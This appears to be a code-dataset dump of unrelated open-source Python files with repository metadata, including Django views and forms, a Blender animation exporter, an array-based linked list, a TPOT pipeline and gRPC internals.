    author="Nathan Henrie",
    author_email="nate@n8henrie.com",
    url="https://github.com/n8henrie/fauxmo",
    packages=find_packages("src"),
    package_dir={"": "src"},
    include_package_data=True,
    license="MIT",
    zip_safe=False,
    keywords=["fauxmo", "alexa", "amazon echo"],
    classifiers=[
        "Natural Language :: English",
        "Programming Language :: Python :: 3.6"
    ],
    extras_require={
        "dev": dev_requirements
    },
    test_suite="tests",
    tests_require=test_requirements,
    entry_points={'console_scripts': ['fauxmo=fauxmo.cli:cli']},
    python_requires=">=3.6",
)
|
[
"nate@n8henrie.com"
] |
nate@n8henrie.com
|
8f2804428b63e25c8e704fb9def3a459ee42e87d
|
3b1053429de896731fe659b8ea09efe5f8bdc4cb
|
/src/db/DBStpHardware.py
|
902519e353ffa62e3425ec8e2b8cb150f10325d0
|
[] |
no_license
|
rajgu/machine-master
|
57bb6f05fce5dfa512ecd10bc5e7bb31bbd76b8a
|
f1a6081c9bfde1937341a1a55478c08d48005f05
|
refs/heads/master
| 2020-03-26T22:09:14.058722
| 2018-08-20T15:42:00
| 2018-08-20T15:42:00
| 145,435,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
from src.db.Crud import Crud
class DBStpHardware(Crud):
    """CRUD accessor for the ``stp_hardware`` table.

    Every operation delegates to the generic Crud base, passing this
    table's name, column structure and horizontal-key flag.
    """
    # Table name and per-column type/validation descriptors consumed by Crud.
    _table_name = 'stp_hardware'
    _table_struct = {
        'stp_id' : {'type' : 'integer', 'validate' : True},
        'type' : {'type' : 'text', 'validate' : True},
        'name' : {'type' : 'text', 'validate' : True},
        'serial_number': {'type' : 'text', 'validate' : True},
        'location' : {'type' : 'text', 'validate' : True}
    }
    _horizontal_key = False
    def __init__(self, db):
        # NOTE(review): Crud.__init__ presumably returns None, so the
        # explicit `return` is a harmless no-op.
        return Crud.__init__(self, db)
    def create(self, data):
        return Crud.create(self, data, self._table_name, self._table_struct, self._horizontal_key)
    def read(self, data, oldata=False):
        return Crud.read(self, data, self._table_name, self._table_struct, self._horizontal_key, oldata)
    def update(self, data, where):
        return Crud.update(self, data, where, self._table_name, self._table_struct, self._horizontal_key)
    def delete(self, data):
        return Crud.delete(self, data, self._table_name, self._table_struct, self._horizontal_key)
|
[
"="
] |
=
|
aba2a884d4f2b0a73725dccefc5950fbfc7e745e
|
74afe97073a0693042d31567ba1a5741bcdebf72
|
/tests/utils.py
|
82762100c4b3ab85ace2b7d2ff312d3fe836d466
|
[
"Apache-2.0"
] |
permissive
|
bruvio/tinyber
|
82aa34a5cdf842caa0f863540b249e37ae09fc78
|
d20d33341f9e74ba9b699553a8cf6448c167dec9
|
refs/heads/master
| 2021-05-29T23:07:58.841678
| 2015-07-23T23:24:52
| 2015-07-23T23:24:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
from asn1ate import parser
from asn1ate.sema import *
from tinyber.walker import Walker
from tinyber.py_nodes import PythonBackend as Backend
from tinyber import py_nodes as nodes
def generate(infilename, outfilename):
    """Compile the ASN.1 file *infilename* into Python code under tests/.

    Parses the definition, builds its semantic model (which must contain
    exactly one module), and emits code via the Python backend using
    *outfilename* as the generated module name.
    """
    class FakeArgs(object):
        # Minimal stand-in for the CLI argument object the backend expects.
        no_standalone = False
    # NOTE(review): this local `import os` appears unused.
    import os
    with open(infilename) as f:
        asn1def = f.read()
    parse_tree = parser.parse_asn1(asn1def)
    modules = build_semantic_model(parse_tree)
    assert (len(modules) == 1)
    module_name = outfilename
    path = "tests"
    args = FakeArgs()
    # pull in the python-specific node implementations
    walker = Walker(modules[0], nodes)
    walker.walk()
    backend = Backend(args, walker, module_name, path)
    backend.generate_code()
def test_reload():
    """Re-import the tests package so a freshly generated module is seen."""
    import sys
    # NOTE(review): slice-assigning the string '.' inserts its characters;
    # here that is the single element '.', so it works, but ['.'] would be
    # clearer.  Also, bare `reload` is Python 2 only (importlib.reload in 3).
    sys.path[:0] = '.'
    # reload tests since we just created a new module
    import tests
    reload(tests)
|
[
"mark@peek.org"
] |
mark@peek.org
|
7aa513a018f1f1887b44be7689dd657b6c9f8ed5
|
fc20620a1fe41c83cb4c17ce36e5d3e6d5dd58fa
|
/src/python/dicomifier/__main__.py
|
b0fac30dd2023b3cfec7b87015b30eef36314d09
|
[
"LicenseRef-scancode-cecill-b-en"
] |
permissive
|
lamyj/dicomifier
|
bdd3ad5756563365fe59a31166cbcaa14f98603f
|
8601760917f7ef47d87fbd61d2c647c3d9cbeb3e
|
refs/heads/master
| 2023-04-28T15:45:52.571809
| 2023-04-20T15:50:03
| 2023-04-20T15:50:03
| 32,533,252
| 33
| 11
|
NOASSERTION
| 2022-09-12T16:53:20
| 2015-03-19T16:28:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,955
|
py
|
#########################################################################
# Dicomifier - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
#########################################################################
import argparse
import logging
import sys
from . import commands
def main():
    """Parse command-line arguments and dispatch to a dicomifier subcommand.

    Returns 1 (for ``sys.exit``) when no subcommand was selected.
    """
    parser = argparse.ArgumentParser(description="Dicomifier")
    parser.add_argument(
        "--verbosity", "-v", dest="main_verbosity",
        choices=["warning", "info", "debug"], default="warning")
    subparsers = parser.add_subparsers(help="Available commands")
    # Register one sub-parser per command module; each gets its own
    # verbosity flag so -v works before or after the command name.
    command_parsers = {}
    for name in ["list", "search", "to_dicom", "to_nifti", "diffusion_scheme"]:
        command = getattr(commands, name)
        subparser = command.setup(subparsers)
        subparser.add_argument(
            "--verbosity", "-v", dest="child_verbosity",
            choices=["warning", "info", "debug"], default="warning")
        subparser.set_defaults(action=command.action)
        command_parsers[command.action] = subparser
    arguments = vars(parser.parse_args())
    if "action" not in arguments:
        parser.print_help()
        return 1
    # The more verbose of the two flags wins (lower logging level = more output).
    main_verbosity = arguments.pop("main_verbosity").upper()
    child_verbosity = arguments.pop("child_verbosity").upper()
    verbosity = min(
        [getattr(logging, x) for x in [main_verbosity, child_verbosity]])
    logging.basicConfig(
        level=verbosity,
        format="%(levelname)s - %(name)s: %(message)s")
    action = arguments.pop("action")
    try:
        action(**arguments)
    except Exception as e:
        # Debug mode shows the full traceback; otherwise a short parser error.
        if verbosity == logging.DEBUG:
            raise
        else:
            command_parsers[action].error(e)
if __name__ == "__main__":
sys.exit(main())
|
[
"lamy@unistra.fr"
] |
lamy@unistra.fr
|
1b103e18ecb604e87e2f579cf645558421707b91
|
8690ca0028c54b62d68badf1753fc6151ae03525
|
/Part3 Levels of Aggregation/fse_data/AllROIs/tpot_mnist_pipeline_triangulateAggregationLevelParticipantSplitaggr_2_groups4.py
|
7d1fc2a6145b7665e8206ac0c752c83a15062340
|
[] |
no_license
|
brains-on-code/conducting-and-analyzing-human-studies
|
fd74ee77fdc56cc61bdc1e0cf9bf423780f5dddc
|
548e7443f4d2bdb2db1f2858289b7d3518593c59
|
refs/heads/master
| 2021-06-26T21:30:56.386121
| 2020-12-22T13:49:16
| 2020-12-22T13:49:16
| 195,975,817
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 830
|
py
|
# Auto-generated TPOT pipeline: load a CSV, split it, fit a RandomForest on
# the training fold and predict the held-out fold.
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

# NOTE: Make sure that the class is labeled 'target' in the data file
tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR', dtype=np.float64)
features = tpot_data.drop('target', axis=1).values
# Fixed random_state keeps the train/test split reproducible across runs.
training_features, testing_features, training_target, testing_target = \
    train_test_split(features, tpot_data['target'].values, random_state=42)

# Score on the training set was:1.0
exported_pipeline = RandomForestClassifier(bootstrap=False, criterion="gini", max_features=0.6500000000000001, min_samples_leaf=8, min_samples_split=6, n_estimators=100)
exported_pipeline.fit(training_features, training_target)
results = exported_pipeline.predict(testing_features)
|
[
"fmriml@fmriml.com"
] |
fmriml@fmriml.com
|
5594d738155165df35681f20b39b82b9a8c92c1f
|
c9ab605cdd2dbf92c9de05768ade0ecf1718be02
|
/03_Django/04_django_crud_review/jobs/views.py
|
92e5f3400502a07e8cddaa907118983276b91bed
|
[] |
no_license
|
PyeongGang-Kim/TIL
|
42d69308cf99d2e07644b51d7636e1b64551a697
|
8711501d131ee7d78fdaac544dda2008adf820a1
|
refs/heads/master
| 2023-01-12T21:10:38.027946
| 2021-10-23T07:19:48
| 2021-10-23T07:19:48
| 195,937,990
| 10
| 1
| null | 2023-01-07T11:25:30
| 2019-07-09T05:22:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,489
|
py
|
from django.shortcuts import render
from .models import Job
from faker import Faker
from decouple import config
import requests
from IPython import embed
from pprint import pprint
# Create your views here.
def index(request):
    """Render the landing page with the name-entry form."""
    return render(request, 'jobs/index.html')
def past_life(request):
    """Show the "past life" job for the POSTed name, with matching images.

    Unknown names get a fake job from Faker, which is persisted so the same
    name always maps to the same job.  A GIPHY GIF and a Naver image search
    result for that job are rendered alongside.
    """
    name = request.POST.get('name')
    person = Job.objects.filter(name=name).first()
    if person:
        past_job = person.past_job
    else:
        # First visit for this name: invent a job and remember it.
        fake = Faker()
        past_job = fake.job()
        person = Job(name=name, past_job=past_job)
        person.save()
    # GIPHY
    # 1. read the API key from the environment (.env via python-decouple)
    GIPHY_API_KEY = config('GIPHY_API_KEY')
    url = 'http://api.giphy.com/v1/gifs/search?api_key={}&q={}&limit=1&'.format(GIPHY_API_KEY, past_job)
    data = requests.get(url).json()
    image = data.get('data')[0].get('images').get('original').get('url')
    # Naver image search
    # 1. prepare the request headers (API credentials)
    headers = {
        'X-Naver-Client-Id': config('NAVER_ID'),
        'X-Naver-Client-Secret': config('NAVER_SECRET')
    }
    # 2. prepare the request URL
    url2 = 'https://openapi.naver.com/v1/search/image?query='+past_job+'&filter=medium&display=1'
    # 3. send the request
    naver_image = requests.get(url2, headers=headers).json().get('items')[0].get('link')
    context = {'person': person, 'image': image, 'naver_image': naver_image}
    return render(request, 'jobs/past_life.html', context)
    # --- earlier draft kept for reference (unreachable) ---
    # try:
    #     name = request.POST.get('name')
    #     job = Job.objects.get(name=name)
    #     # build the request url
    #     try:
    #         image = requets.get(url).json().
    #     except:
    #         image = None
    #     context = {
    #         'past_life': job.past_job,
    #         'name': name,
    #         'image': image,
    #     }
    #     embed()
    #     return render(request, 'jobs/past_life.html', context)
    # except:
    #     fake = Faker()
    #     job = Job(name=name, past_job=fake.job())
    #     job.save()
    #     url = 'http://api.giphy.com/v1/gifs/search?api_key=' + GIPHY_API_KEY + '&q='+job.past_job+'&limit=1'
    #     try:
    #         image = requets.get(url).json().get('data')[0].get('images').get('original').get('url')
    #     except:
    #         image = None
    #     context = {
    #         'past_life': job.past_job,
    #         'name': name,
    #         'image': image,
    #     }
    #     return render(request, 'jobs/past_life.html', context)
|
[
"pyeonggangkim@gmail.com"
] |
pyeonggangkim@gmail.com
|
8d8bd2733afc957d19afad643b783047d417c231
|
b40fbe6d0012a299b0e771d2e5f0cfca3fe5be2b
|
/gen_bulk.py
|
f4fad52f721f76c134105cc0a87572a95af0cbb3
|
[] |
no_license
|
olimpiadi-informatica/randomtex
|
e8555776daa3761b6014cdf006b9c903db7f0fb2
|
1da019715c44db6a51135cb02dbf5a4e52586a95
|
refs/heads/main
| 2023-04-14T15:15:25.641932
| 2021-04-26T13:57:47
| 2021-04-26T14:13:03
| 358,237,479
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,612
|
py
|
#!/usr/bin/env python3
import argparse
import csv
import datetime
import json
import logging
import multiprocessing.dummy as mp
import os
import random
import shutil
import tempfile
import progressbar
import compilation
import utils
progressbar.streams.wrap_stderr()
logger = logging.getLogger("gen_bulk")
def process_user(user, args, work_dir):
    """Render, compile and (optionally) encrypt one student's contest PDF.

    Mutates *user* in place with the solutions and question order, then
    returns it.  If the target PDF already exists the compilation is
    skipped (the user row is still returned).
    """
    contest_dir = args.contest_dir
    # Deterministic per-user randomisation driven by the CSV 'seed' column.
    rnd = random.Random(int(user["seed"]))
    tex, sol, order = utils.render_contest(contest_dir, rnd, context=user)
    user["solutions"] = ":".join(sol)
    user["questions_order"] = ":".join(map(str, order))
    filename = user["filename"]
    password = user["pdf_password"]
    target = os.path.join(args.output_pdf, filename)
    if os.path.exists(target):
        logger.warning("File %s already present, skipping...", target)
        return user
    # Compile into a temp file, then move/encrypt it to the final location.
    with tempfile.NamedTemporaryFile(prefix=filename) as f:
        compilation.compile(tex, f.name, work_dir)
        if args.no_enc:
            shutil.move(f.name, target)
        else:
            logger.info("Encrypting PDF %s -> %s", f.name, target)
            utils.encrypt_pdf(f.name, target, password)
    return user
def generate(args, work_dir, users):
    """Compile every user's PDF in parallel and write the solutions CSV."""
    contest_dir = args.contest_dir
    compilation.setup(contest_dir, work_dir)
    os.makedirs(args.output_pdf, exist_ok=True)
    def process(user):
        # Bind args/work_dir so the pool maps over a one-argument callable.
        return process_user(user, args, work_dir)
    result = []
    # Progress bar layout: "[n / m] [pct] [bar] elapsed | ETA".
    widgets = [
        "[",
        progressbar.SimpleProgress(),
        " / ",
        progressbar.Percentage(),
        "] ",
        progressbar.Bar(),
        " ",
        progressbar.Timer(),
        " | ",
        progressbar.AdaptiveETA(samples=datetime.timedelta(seconds=10)),
    ]
    # multiprocessing.dummy.Pool = thread pool; work is dominated by the
    # external LaTeX/encryption subprocesses, so threads suffice.
    with mp.Pool(args.num_cores) as pool:
        for res in progressbar.progressbar(
                pool.imap_unordered(process, users),
                max_value=len(users),
                redirect_stdout=True,
                widgets=widgets,
        ):
            if res:
                result.append(res)
    headers = list(result[0].keys())
    with open(args.output_csv, "w") as f:
        writer = csv.DictWriter(f, headers)
        writer.writeheader()
        writer.writerows(result)
def main(args):
    """Load the users CSV and run generation in the chosen working directory.

    When no --work-dir was given, a throwaway temporary directory is used.
    """
    with open(args.users_csv) as csv_file:
        users = list(csv.DictReader(csv_file))
    if args.work_dir:
        generate(args, args.work_dir, users)
        return
    with tempfile.TemporaryDirectory() as tmp_dir:
        generate(args, tmp_dir, users)
if __name__ == "__main__":
    # Command-line entry point: wire up arguments and logging, then delegate
    # to main().
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--work-dir",
        "-w",
        help="Working directory for the compilation",
    )
    parser.add_argument(
        "--num-cores",
        "-j",
        help="Number of parallel compilations",
        type=int,
    )
    parser.add_argument("--verbose", "-v", help="Verbose output", action="store_true")
    parser.add_argument("--no-enc", help="Do not encrypt the pdfs", action="store_true")
    parser.add_argument("contest_dir", help="Directory with the contest")
    parser.add_argument("users_csv", help="Path to the csv file with the students data")
    parser.add_argument(
        "output_pdf",
        help="Directory of where to save the compiled pdf files",
    )
    parser.add_argument(
        "output_csv",
        help="Path where to save the CSV with the solutions",
    )
    args = parser.parse_args()
    logging.basicConfig(
        level=logging.DEBUG if args.verbose else logging.INFO,
        format="%(asctime)s [%(levelname)s] [%(name)s] %(message)s",
    )
    main(args)
|
[
"williamdiluigi@gmail.com"
] |
williamdiluigi@gmail.com
|
f8938e7c7df3a92df60e420a4429cb058096a7e6
|
4be5c172c84e04c35677f5a327ab0ba592849676
|
/python/data_structures/array/sll/sll.py
|
dbdb9af0a8277d797c590e960437f9b0ac88de97
|
[] |
no_license
|
niranjan-nagaraju/Development
|
3a16b547b030182867b7a44ac96a878c14058016
|
d193ae12863971ac48a5ec9c0b35bfdf53b473b5
|
refs/heads/master
| 2023-04-06T20:42:57.882882
| 2023-03-31T18:38:40
| 2023-03-31T18:38:40
| 889,620
| 9
| 2
| null | 2019-05-27T17:00:29
| 2010-09-05T15:58:46
|
Python
|
UTF-8
|
Python
| false
| false
| 5,315
|
py
|
'''
A SLL implemented using regular arrays
SLL corresponding to
78 -> 10 -> 41 -> 36 -> 21
is represented below
| Index | Node | Node |
| | data | next |
|-------+------+------|
| 0 | 10 | 7 |
| 1 | | |
| 2 | 36 | 9 |
| 3 | | |
| 4 | | |
head -> | 5 | 78 | 0 |
| 6 | | |
| 7 | 41 | 2 |
| 8 | | |
| 9 | 21 | -1 |
| 10 | | |
The underlying array for the SLL contains two disjoint lists
1. Available-list: contains a list of nodes that are available
2. Allocated-list: contains a list of nodes that are currently in use
'''
class SLL(object):
    """Singly linked list stored inside a fixed-capacity array.

    Slots of ``_array`` are chained by index into two disjoint lists:
    the *available* list of free slots and the *allocated* list of nodes
    currently in use.  A ``next`` value of -1 terminates a chain.
    ``getNode`` raises MemoryError once all ``capacity`` slots are in use.
    """

    class Node(object):
        """One array slot: payload plus the index of the next slot."""

        def __init__(self, data=None, next=-1):
            self.data = data
            # next index == -1 implies there's no next link
            self.next = next

        def __repr__(self):
            return str(self)

        def __str__(self):
            return str((self.data, self.next))

    def __init__(self, capacity):
        self.capacity = capacity
        self._allocated = 0
        # Initially all nodes are available: chain them one-after-another
        # sequentially into the available list.  (``range`` replaces the
        # Python-2-only ``xrange`` so the class also runs on Python 3.)
        self._array = [SLL.Node(None, i + 1) for i in range(self.capacity)]
        self._array[-1].next = -1  # tail of the available list
        self.available_list = 0    # index 0 is head of the available list
        self.allocated_list = -1   # allocated list is empty
        self.allocated_tail = -1   # allocated list is empty => no tail

    def __len__(self):
        return self._allocated

    def __str__(self):
        lStr = '[{}]: '.format(len(self))
        head = self.allocated_list
        while head != -1:
            lStr += str(self._array[head].data) + " -> "
            head = self._array[head].next
        return lStr

    def getNode(self, data):
        """Detach a free slot, store *data* in it and return its index.

        Raises MemoryError when the available list is exhausted.
        """
        if self.available_list == -1:
            raise MemoryError("Linked list is at capacity")
        node = self.available_list
        self.available_list = self._array[self.available_list].next
        self._array[node].next = -1
        self._array[node].data = data
        self._allocated += 1
        return node

    def freeNode(self, node):
        """Return slot *node* to the head of the available list."""
        self._allocated -= 1
        # Blank the payload so every slot on the available list is an
        # obviously reusable, empty container.
        self._array[node].data = None
        self._array[node].next = self.available_list
        self.available_list = node

    def push_back(self, data):
        """Append *data* at the tail of the SLL."""
        node = self.getNode(data)
        if self.allocated_list == -1:
            self.allocated_list = self.allocated_tail = node
            return
        self._array[self.allocated_tail].next = node
        self.allocated_tail = node

    def push_front(self, data):
        """Prepend *data* at the head of the SLL."""
        node = self.getNode(data)
        self._array[node].next = self.allocated_list
        self.allocated_list = node
        if self.allocated_tail == -1:
            # First node added: it is both head and tail.
            self.allocated_tail = node

    def pop_front(self):
        """Remove and return the first element, or None if the list is empty."""
        if self.allocated_list == -1:
            return None
        node = self.allocated_list
        data = self._array[node].data
        self.allocated_list = self._array[self.allocated_list].next
        if self.allocated_list == -1:
            self.allocated_tail = -1
        self.freeNode(node)
        return data

    def pop_back(self):
        """Remove and return the last element, or None if the list is empty."""
        if self.allocated_list == -1:
            return None
        data = self._array[self.allocated_tail].data
        if self.allocated_list == self.allocated_tail:
            # Single-node case handled up front: the predecessor scan below
            # never terminated for it in the original implementation (the
            # head's next is -1, so the scan walked off the list).
            self.freeNode(self.allocated_tail)
            self.allocated_list = self.allocated_tail = -1
            return data
        # Walk to the predecessor of the tail.
        node = self.allocated_list
        while self._array[node].next != self.allocated_tail:
            node = self._array[node].next
        self.freeNode(self.allocated_tail)
        self._array[node].next = -1
        self.allocated_tail = node
        return data

    def place(self, data):
        """Insert *data* at its sorted (ascending) position.

        Inserting only via place() keeps the SLL sorted.
        """
        node = self.getNode(data)
        if self.allocated_list == -1:
            self.allocated_list = self.allocated_tail = node
            return
        if data < self._array[self.allocated_list].data:
            # Smaller than everything: becomes the new head.
            self._array[node].next = self.allocated_list
            self.allocated_list = node
            return
        if data >= self._array[self.allocated_tail].data:
            # Not smaller than the tail: becomes the new tail.
            self._array[self.allocated_tail].next = node
            self.allocated_tail = node
            return
        tmp = self.allocated_list
        prev = None
        while tmp != -1 and self._array[tmp].data <= data:
            prev = tmp
            tmp = self._array[tmp].next
        # Insert after prev, before tmp.
        self._array[prev].next = node
        self._array[node].next = tmp
|
[
"vinithepooh@gmail.com"
] |
vinithepooh@gmail.com
|
2553bc5ec831453cc73c3732fdbffe014c7cf7ce
|
e82b761f53d6a3ae023ee65a219eea38e66946a0
|
/All_In_One/addons/mc-animation-blender/operator_anim_export.py
|
503e83160184e749fd854f38b8b1ff3864169f8f
|
[] |
no_license
|
2434325680/Learnbgame
|
f3a050c28df588cbb3b14e1067a58221252e2e40
|
7b796d30dfd22b7706a93e4419ed913d18d29a44
|
refs/heads/master
| 2023-08-22T23:59:55.711050
| 2021-10-17T07:26:07
| 2021-10-17T07:26:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,913
|
py
|
import bpy
import math
import json
# ExportHelper is a helper class, defines filename and
# invoke() function which calls the file selector.
from bpy_extras.io_utils import ExportHelper
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
class operator_anim_export(Operator, ExportHelper):
    """Export operator: writes the active object's animation to a .mcanim file."""
    bl_idname = "mcanim.export"  # name under which bpy.ops exposes this operator
    bl_label = "Export Minecraft Animation (.mcanim)"
    # ExportHelper mixin class uses this
    filename_ext = ".mcanim"
    filter_glob = StringProperty(
        default="*.mcanim",
        options={'HIDDEN'},
        maxlen=255,  # Max internal buffer length, longer would be clamped.
    )
    # List of operator properties, the attributes will be assigned
    # to the class instance from the operator settings before calling.
    looping = BoolProperty(
        name="Looping",
        description="Should this animation loop?",
        default=True,
    )
    resetWhenDone = BoolProperty(
        name="Reset when done",
        description="Should this reset to starting position when done?",
        default=False,
    )
    id = StringProperty(
        name="ID",
        description="Unique numerical ID that Minecraft will refer to this animation by",
        default='0',
    )

    def execute(self, context):
        # Delegate to the module-level export helper with the chosen options.
        return export(context, self.id, self.looping, self.resetWhenDone, self.filepath)
# specific export function for menu
def export(context, id, looping, resetWhenDone, path):
    """Export the active scene object's animation; *id* is parsed to an int."""
    return write_mcanim(context, context.scene.objects.active, int(id), looping, resetWhenDone, path)
# write animation to disk
def write_mcanim(context, object, id, looping, resetWhenDone, path):
    """Serialise every scene frame of *object*'s animation to a .mcanim JSON file.

    The file contains the format version, the numeric animation *id*, the
    looping/reset flags, and one entry per frame from frame_start to
    frame_end (exclusive).  Returns {'FINISHED'} for Blender's operator API.
    """
    frames = []
    # output all frames into frames array
    for i in range(context.scene.frame_start, context.scene.frame_end):
        frames.append(write_frame(context, object, i))
    # add additional metadata to file
    output = {
        "version": "0.2",
        "id": id,
        "looping": looping,
        "resetPos": resetWhenDone,
        "frames": frames
    }
    # create json string
    formatted = json.dumps(output, sort_keys=True, indent=4, separators=(',', ': '))
    # Write via a context manager: the original called ``file.close`` without
    # parentheses, so the handle was never actually closed.
    with open(path, "w") as out_file:
        out_file.write(formatted)
    print("Outputted to: "+path)
    return {'FINISHED'}
# returns a dictionary with a single frame of animation
def write_frame(context, object, frame):
    """Sample the pose at *frame* and return the bone values as a dict.

    Assumes the armature has bones named body, left_arm, right_arm,
    left_leg, right_leg, head and root -- TODO confirm rig convention.
    """
    # make sure we're on the right frame
    context.scene.frame_set(frame)
    # get all the bones in the armature
    bones = object.pose.bones
    # get values from said bones (converted to Minecraft's degree axes)
    body = convert_array(get_rotation(bones['body']), False)
    left_arm = convert_array(get_rotation(bones['left_arm']), False)
    right_arm = convert_array(get_rotation(bones['right_arm']), False)
    left_leg = convert_array(get_rotation(bones['left_leg']), False)
    right_leg = convert_array(get_rotation(bones['right_leg']), False)
    head = convert_array(get_rotation(bones['head']), True)
    # Root carries the overall position (rounded) and Y-axis heading.
    location = [round(bones['root'].location[0], 2), round(bones['root'].location[1], 2), round(bones['root'].location[2], 2)]
    rotation = round(math.degrees(get_rotation(bones['root'])[1]), 2)
    # output found values to dictionary
    output = {
        "body": body,
        "left_arm": left_arm,
        "right_arm": right_arm,
        "left_leg": left_leg,
        "right_leg": right_leg,
        "head": head,
        "location": location,
        "rotation": rotation
    }
    return output
# returns the rotation in euler, no matter what it was initially in
def get_rotation(input):
    """Return the bone's rotation as Euler angles regardless of its mode."""
    quaternion_mode = (input.rotation_mode == 'QUATERNION')
    if quaternion_mode:
        # Quaternions are converted so callers always receive Euler angles.
        return input.rotation_quaternion.to_euler()
    return input.rotation_euler
# Convert a radian Euler triple (from armature.pose.bones[bone].rotation_euler)
# to Minecraft's degree convention, rounded to two decimals.
def convert_array(array, isHead):
    """Head bones negate X and Y; other bones swap X/Z and negate the new Z."""
    if isHead:
        reordered = (array[0] * -1, array[1] * -1, array[2])
    else:
        reordered = (array[2], array[1], array[0] * -1)
    return [round(math.degrees(component), 2) for component in reordered]
# Only needed if you want to add into a dynamic menu
def menu_func_export(self, context):
    """Menu entry that triggers the exporter from File > Export."""
    self.layout.operator(operator_anim_export.bl_idname, text="Minecraft Animation (.mcanim)")
def register():
    """Hook the export entry into Blender's File > Export menu."""
    bpy.types.INFO_MT_file_export.append(menu_func_export)
def unregister():
    """Remove the export entry from Blender's File > Export menu."""
    bpy.types.INFO_MT_file_export.remove(menu_func_export)
if __name__ == "__main__":
    # Allow running the script directly from Blender's text editor.
    register()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
936b3abfafeee8de92355161e81f2cf35625caf2
|
2d8d7fef8f914f1b2337ee5d6a2e7c61dab9ec4e
|
/基础知识/1.语法基础/13.dict字典-增删改查.py
|
8ea74ff8b009cb80334f8c2c6f4eb2ba593b1051
|
[] |
no_license
|
kuaikang/python3
|
bb5bb8d807c4a8818b18f0d4e598232cc73ab3af
|
60ca72662c7a6e718190ffa6139a129c1412a3fb
|
refs/heads/master
| 2021-04-28T10:32:25.416550
| 2018-07-06T01:59:47
| 2018-07-06T01:59:47
| 122,068,697
| 13
| 11
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 658
|
py
|
# Demo of basic dict operations: create, add, update, delete, lookup, iterate.
print("字典是key-value的数据类型".center(50, "-"))
print("字典是无序的,key不能重复")
info = {"stu1": "tom", "stu2": "jack", "stu3": "lucy"}
print(info)
# add a new key
info["stu4"] = "bob"
# update an existing key
info["stu1"] = "zhang"
# delete
# info.pop("stu2")  # the standard removal method
# del info["stu3"]
# lookup
print('-----',info.get("stu11"))  # returns None when the key is missing
# print(info["stu0"])  # raises KeyError when the key is missing
print(info)
print()
import sys
# Iterate keys, values, and key/value pairs on one line each.
for key in info.keys():
    sys.stdout.write(key + " ")
print()
for val in info.values():
    sys.stdout.write(val + " ")
print()
for key, val in info.items():
    sys.stdout.write(key + "-->" + val + " ")
|
[
"359405466@qq.com"
] |
359405466@qq.com
|
9b1336a598319774d6c7b2b0860e876c933a8cbc
|
c1fe97208afe479b7ae1ee67d69866a6911564ca
|
/Login/profilecreate/forms.py
|
99f047fe4e0523e89dce7b7d71637698624e0c1c
|
[] |
no_license
|
jaindhairyahere/Python_Django
|
a0a46c57b6ca60d0942ae181fe28ea56bb1ee948
|
f170a2e38b78df698a02821a454a3baea0c358a6
|
refs/heads/master
| 2020-06-18T09:17:56.364928
| 2019-11-02T18:34:12
| 2019-11-02T18:34:12
| 196,249,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 633
|
py
|
from django import forms
from django.contrib.auth.admin import User
from .models import Alumni
from django.core import validators
def check_PhoneNumber(value):
    """Form validator: reject any value that is not exactly 10 characters long."""
    expected_length = 10
    if len(value) != expected_length:
        raise forms.ValidationError("Not a phone Number")
class UserForm(forms.ModelForm):
    """Signup form for Django's built-in User; the password input is masked."""
    password = forms.CharField(widget = forms.PasswordInput())
    class Meta():
        model = User
        fields = ('username','email','password',)
class AlumniForm(forms.ModelForm):
    """Profile form for Alumni; the linked user_model is set by the view."""
    class Meta():
        model = Alumni
        exclude = ('user_model',)
class LoginForm(forms.Form):
    """Plain (non-model) login form with masked password entry."""
    username = forms.CharField(max_length=264)
    password = forms.CharField(widget = forms.PasswordInput())
|
[
"jaindhairya2001@gmail.com"
] |
jaindhairya2001@gmail.com
|
e946bbe4ccbf8914231a25812913ff77829d1f28
|
545afb3cfe89f82b558faa5b5b28c28b8e3effce
|
/venv/Lib/site-packages/grpc/_plugin_wrapping.py
|
6c925826d6f4cb8b3a86acd5ac23cf15ebe0b1e0
|
[
"MIT"
] |
permissive
|
parthpankajtiwary/keras-groundup
|
24ad45a4b872e6d77fff8a6f4a3a6d60124a0628
|
0df0844e7d9dca741fad0965761a12f72ee51f07
|
refs/heads/master
| 2022-11-09T22:34:35.716466
| 2019-10-01T11:01:59
| 2019-10-01T11:01:59
| 210,914,101
| 0
| 1
|
MIT
| 2022-10-25T06:47:55
| 2019-09-25T18:31:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,527
|
py
|
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import grpc
from grpc import _common
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
class _AuthMetadataContext(
        collections.namedtuple('AuthMetadataContext', (
            'service_url',
            'method_name',
        )), grpc.AuthMetadataContext):
    """Immutable (service_url, method_name) context handed to auth plugins."""
    pass
class _CallbackState(object):
    """Mutable flags shared between a plugin invocation and its callback.

    All fields are guarded by ``lock``: ``called`` records that the callback
    already fired; ``exception`` records an error raised by the plugin itself.
    """

    def __init__(self):
        self.lock = threading.Lock()
